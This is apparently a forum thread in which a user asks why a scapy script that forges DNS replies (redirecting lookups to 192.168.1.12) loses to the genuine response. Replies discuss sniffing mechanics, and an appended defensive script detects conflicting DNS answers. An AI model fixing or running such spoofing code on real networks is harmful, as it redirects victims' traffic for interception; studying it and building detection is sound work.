Fake DNS response
I wanted to create a fake DNS response with scapy and it just doesn't work... When I sniff the packets in Wireshark it shows me that the packets are correct, but Windows just takes the genuine response packet although...
Can someone tell me how to fix it please?
Thanks
    import sys
    i, o, e = sys.stdin, sys.stdout, sys.stderr
    from scapy.all import *
    sys.stdin, sys.stdout, sys.stderr = i, o, e

    def f(packet):
        if DNS in packet and DNSQR in packet:
            return True
        return False

    while True:
        a = sniff(lfilter=f, count=1)
        ip = a[0].getlayer(IP)
        dns = a[0].getlayer(DNS)
        pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
        pkt.show()
        for i in range(10):
            sendp(pkt)
python sockets dns response scapy
asked Nov 12 '18 at 18:12 by Liron (edited Nov 12 '18 at 19:02)
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
1 Answer
You're just sniffing packets; if you want to manipulate packets you should send them to a function, then forward them to the destination. Use the prn attribute in sniff:

    from scapy.all import sniff, UDP, DNS

    def func(packet):
        if packet.haslayer(UDP) and packet.haslayer(DNS):
            # manipulate your DNS packet here then forward it
            pass

    packets = sniff(filter="port 53", prn=func, count=1)
answered Nov 13 '18 at 6:27 by Ali Kargar
The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assign it to a variable, it means you grab the packet's information and send it to the destination; after that you'll send a fake one. But with prn and sending the packet to a function, you grab the original and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performance.
– Cukic0d
Nov 20 '18 at 22:21
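
Added example, not part of the original thread: when a genuine and a forged reply both reach a client for one query, as the comments above discuss, a defender can spot it as two responses for the same DNS transaction carrying different A records. The sketch below does that with the standard library only; the function names, the client address 10.0.0.5 and the `.test` names are constructed for illustration.

```python
import struct
from collections import defaultdict

def read_name(msg, off):  # decode a name, following compression pointers -> (name, next_off)
    labels, end = [], None
    for _ in range(256):                          # bounded walk: stops pointer loops
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # 2-byte compression pointer
            end = off + 2 if end is None else end
            off = ((n & 0x3F) << 8) | msg[off + 1]
        elif n == 0:                              # root label ends the name
            return ".".join(labels), off + 1 if end is None else end
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace").lower())
            off += 1 + n
    raise ValueError("compression pointer loop or over-long name")

def parse_response(msg):
    """Return (txid, qname, sorted tuple of A-record addresses) from a DNS response."""
    txid, _flags, qd, an = struct.unpack("!4H", msg[:8])
    off, qname, addrs = 12, "", []
    for _ in range(qd):
        qname, off = read_name(msg, off)
        off += 4                                  # skip QTYPE and QCLASS
    for _ in range(an):
        _, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == 1 and rdlen == 4:             # A record
            addrs.append(".".join(map(str, msg[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, qname, tuple(sorted(addrs))

def find_conflicts(responses):
    """Map (client, port, txid, qname) -> answer sets, where more than one was seen."""
    seen = defaultdict(set)
    for client, port, raw in responses:
        txid, qname, addrs = parse_response(raw)
        seen[(client, port, txid, qname)].add(addrs)
    return {key: answers for key, answers in seen.items() if len(answers) > 1}

def sample_response(txid, name, addr):            # builds constructed test input
    q = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\0"
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 3600, 4) + bytes(map(int, addr.split(".")))
    return struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1) + rr

# Constructed capture of (client_ip, client_port, raw DNS response); not real traffic.
CAPTURE = [("10.0.0.5", 53124, sample_response(0x1A2B, "example.test", a))
           for a in ("203.0.113.10", "192.168.1.12")]
CAPTURE.append(("10.0.0.5", 53125, sample_response(0x1A2C, "other.test", "203.0.113.20")))
```

`find_conflicts(CAPTURE)` returns the single transaction that received two different answers. A hit is a lead to investigate rather than proof of spoofing, since a retried query can legitimately be answered with a different record set.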